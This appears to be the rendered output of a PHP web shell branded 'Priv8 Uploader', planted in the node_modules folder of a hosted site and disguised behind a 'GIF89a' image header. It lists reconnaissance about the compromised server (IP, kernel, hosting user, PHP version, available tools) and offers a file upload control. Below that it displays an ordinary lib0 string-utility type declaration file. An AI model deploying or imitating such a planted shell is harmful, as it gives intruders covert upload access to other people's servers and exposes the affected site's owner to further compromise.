GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.217.79 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.24 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/lib0/ |
Upload File : |
/** * Utility module to work with strings. * * @module string */ export const fromCharCode: (...codes: number[]) => string; export const fromCodePoint: (...codePoints: number[]) => string; /** * The largest utf16 character. * Corresponds to Uint8Array([255, 255]) or charcodeof(2x2^8) */ export const MAX_UTF16_CHARACTER: string; export function trimLeft(s: string): string; export function fromCamelCase(s: string, separator: string): string; export function utf8ByteLength(str: string): number; export function _encodeUtf8Polyfill(str: string): Uint8Array<ArrayBuffer>; export const utf8TextEncoder: TextEncoder; export function _encodeUtf8Native(str: string): Uint8Array<ArrayBuffer>; export function encodeUtf8(str: string): Uint8Array<ArrayBuffer>; export function _decodeUtf8Polyfill(buf: Uint8Array): string; export let utf8TextDecoder: TextDecoder | null; export function _decodeUtf8Native(buf: Uint8Array): string; export function decodeUtf8(buf: Uint8Array): string; export function splice(str: string, index: number, remove: number, insert?: string): string; export function repeat(source: string, n: number): string; export function escapeHTML(str: string): string; export function unescapeHTML(str: string): string; //# sourceMappingURL=string.d.ts.map